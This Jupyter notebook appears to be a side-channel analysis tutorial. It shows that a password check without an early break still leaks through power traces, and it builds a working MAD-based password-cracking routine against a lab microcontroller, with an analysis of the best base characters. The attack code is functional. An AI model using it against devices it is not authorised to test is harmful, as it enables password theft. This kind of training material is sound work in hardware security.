# Attack Password with ~~Timing Analysis~~ Difference Analysis III (MAD)

In this example we want to improve the `basic-passwdcheck` to be resistant against the attack from the last tutorial.

## Improving the code

Let's first recap the password checking loop from `basic-passwdcheck`:
```c
for(uint8_t i = 0; i < sizeof(correct_passwd); i++){
    if (correct_passwd[i] != passwd[i]){
        passbad = 1;
        break;
    }
}
```

The timing attack discussed in the last example worked because the loop's runtime varies with the number of correct characters. Once the first wrong character occurs the loop breaks.
This is, what we want to change:

```c
for(uint8_t i = 0; i < sizeof(correct_passwd); i++){
    if (correct_passwd[i] != passwd[i]){
        passbad = 1;
    }
}
```

This is an excerpt from `advanced-passwdcheck.c`. It is clear that the loop does not break after the first wrong character and always all characters of the password are checked. In [Try the old Timing Attack](#Try-the-old-Timing-Attack) we can see that the old timing attack does not work anymore.

## Basic Setup

Define Variables

In [None]:
%run "Init.ipynb"

Build target and upload

In [None]:
TARGET = 'advanced-passwdcheck'
%store TARGET
%run "Passwordcheck_Prepare.ipynb"

Import helper functions

In [None]:
%run "../helper_scripts/Setup_Generic.ipynb"

In [None]:
scope.adc.samples = 400

## Helper Functions for Password Attack

In [None]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool, Label

output_notebook()

In [None]:
def cap_pass_trace(pass_guess, fPrint = False):
    ret = ""
    reset_target(scope)
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()

    if fPrint == True:
        print(ret)
    
    scope.arm()
    target.flush()
    target.write(pass_guess)
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    
    ret = ""
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()
    
    return trace, ret

In [None]:
def sad(trace1, trace2):
    return sum(abs(trace1 - trace2))

## Try the old Timing Attack

Let's try again to see a difference in terms of SAD between a correct and a wrong character.

In [None]:
outputbuf = ""
trace1, _ = cap_pass_trace('a\n', False)
trace2, _ = cap_pass_trace('b\n', False)
trace3, _ = cap_pass_trace('i\n', False)
p = figure()
p.add_tools(CrosshairTool())
p.line(range(len(trace1)), abs(trace1 - trace2), color='blue',
       legend='abs(trace1 - trace2) with SAD = {:.2f}'.format(sad(trace1, trace2)))
p.line(range(len(trace1)), abs(trace1 - trace3), color='red', 
       legend='abs(trace1 - trace3) with SAD = {:.2f}'.format(sad(trace1, trace3)))
show(p)

If you run this maybe more than one time you will see that the SAD is around 8-10 and the difference between the SADs is far too low to distinguish right from wrong characters.

Did we found a "secure" solution where an attacker cannot reveal the password?
The answer is simple: No. It's just a bit harder. We just have to tweak the attack a bit. You might recognize a high peek at around position 70 in the plot above. This peek is much higher in the red plot than in the blue one.

We can use this peek to still get the attack working.

In [None]:
import numpy
def cap_pass_trace_multiple(guess, repetitions):
    traces = 0
    output = ''
    for _ in range(repetitions):
        t, o = cap_pass_trace(guess, False)
        traces += t
        output += o
    return traces, output

In the style of SAD (sum of absolute differences) we call this MAD: Maximum of absolute differences.

In [None]:
def mad(trace1, trace2):
    return max(abs(trace1 - trace2))

If we record more than one trace per attempt we can sum all recorded traces for the same attempt and find out that the peek and especially the difference between the peek hights becomes significant:

In [None]:
outputbuf = ""
trace1, out1 = cap_pass_trace_multiple('\x74\n', 3)
trace2, out2 = cap_pass_trace_multiple('a\n', 3)
trace3, out3 = cap_pass_trace_multiple('i\n', 3)

p = figure()
p.add_tools(CrosshairTool())
p.line(range(len(trace1)), abs(trace1 - trace2), color='blue',
       legend='abs(trace1 - trace2) with MAD = {:.2f}'.format(mad(trace1, trace2)))
p.line(range(len(trace1)), abs(trace1 - trace3), color='red', 
       legend='abs(trace1 - trace3) with MAD = {:.2f}'.format(mad(trace1, trace3)))
show(p)

This can be used to program a 

Now we can program an automated version of the password cracker again:

## MAD password attack

1. Start capturing a wrong character. Let's call this `base_trace`.
2. Capture further characters and calculate the MAD between this and `base_trace`.
3. Start from beginning incorporating the found right character.

This is very similar to the SAD attack. Except we use a different criterion of distinction and everytime we say 'capture a trace' we mean 'capture a few traces and sum them up'.

In [None]:
def mad_attack(check_level=0.1, base_char='\x74'):
    trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'
    password = ''
    outputbuf = ''

    while 'Welcome' not in outputbuf:
        # Capture base_trace with definitly wrong next character
        base_trace, _ = cap_pass_trace_multiple(password + base_char + '\n', 2)

        for c in trylist:
            # Try character
            trace, outputbuf = cap_pass_trace_multiple(password + c + '\n', 2)
            # Check if c is correct
            if mad(base_trace, trace) > check_level:
                print("Success: " + c)
                password += c
                break

    print('Successfully broken password: ' + password)

mad_attack()

We did not tell why `\x74` is a good base character! To give an answer to this question we have to do a detailed analysis:

## Analyze good base characters

First we define a function to print out and analyze the *quality* of a single base character.

In [None]:
import tqdm
import pandas

def test_base_char(base_char):
    trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'
    stats = []
    base_trace, _ = cap_pass_trace_multiple(base_char + '\n', 2)
    for c in tqdm.tqdm_notebook(trylist):
        stats.append(('{:02x}'.format(ord(base_char)), c, mad(base_trace, cap_pass_trace_multiple(c + '\n', 2)[0])))
    df = pandas.DataFrame(stats, columns=['base_char', 'char', 'mad'])
    df = df.sort_values(by='mad', ascending=False)
    return df

stats = test_base_char('\xff')
stats

This can be also put nicely in a plot:

In [None]:
import bokeh.palettes
import bokeh.transform
import bokeh.models

df = stats.copy().sort_values('char')

colormap = bokeh.transform.linear_cmap(
    field_name='mad', 
    palette=bokeh.palettes.Oranges6, 
    low=max(df['mad']),
    high=min(df['mad'])
)

p = figure(x_range=df['char'], title='foo')
p.add_tools(CrosshairTool())
p.vbar(x='char', top='mad', source=df, width=0.5, color=colormap)
show(p)

### Analyze *all* possible base characters

In [None]:
import tqdm
import pandas as pd

def analyse_all_base_chars(
    base_list=list(map(chr, range(1, 256))), 
    trylist='abcdefghijklmnopqrstuvwxyz0123456789',
    filename='mad_chars_stats.dat',
):
    stats = []
    for base_char in tqdm.tqdm_notebook(base_list):
        base_trace, _ = cap_pass_trace_multiple(base_char + '\n', 2)
        for c in tqdm.tqdm_notebook(trylist):
            stats.append(('{:02x}'.format(ord(base_char)), c, mad(base_trace, cap_pass_trace_multiple(c + '\n', 2)[0])))

    stats = pd.DataFrame(stats, columns=['base_char', 'char', 'mad'])
    stats.to_pickle(filename)

# Commented because it takes very long
# analyse_all_base_chars()

In [None]:
import pandas as pd
mad_chars_stats = pd.read_pickle('mad_chars_stats.dat')
mad_chars_stats

In [None]:
from bokeh.models import LinearColorMapper

df = mad_chars_stats.copy()
# df['mad'] = list(range(10))
df['base_char'] = ['0x%02x' % ord(x) for x in df['base_char']]

colormap = LinearColorMapper(
    palette=bokeh.palettes.PuRd5,
    low=max(df['mad']),
    high=min(df['mad']),
)

p = figure(
    x_range=df['base_char'].unique(),
    y_range=df['char'].unique(),
    plot_width=950,
    plot_height=500,
)

p.rect(x='base_char', y='char', source=df, width=1, height=1, 
       fill_color={'field': 'mad', 'transform': colormap},
       line_color=None)
show(p)

What can we see in the above heatmap:
* Dark rects represent a high MAD value.
* Light rects represent a low MAD value.
* We can see the correct character `i`.
* "Good" columns are those which do not have many dark rects.
* The "best" base character is the column where the highest MAD is the most difference from the value that gives `i`.

The "best" base character can be also found programmatically:

In [None]:
import numpy
import pandas

df = mad_chars_stats
stats = []
for base_char in df['base_char'].unique():
    vals = numpy.sort(df[df['base_char'] == base_char]['mad'])
    stats.append((hex(ord(base_char)), vals[-1], vals[-2], vals[-1] - vals[-2]))

df = pandas.DataFrame(stats, columns=['base_char', 'max', 'max2', 'diffdiff'])
df = df.sort_values(by=['diffdiff'], ascending=False)
df

## Disconnect

In [None]:
scope.dis()
target.dis()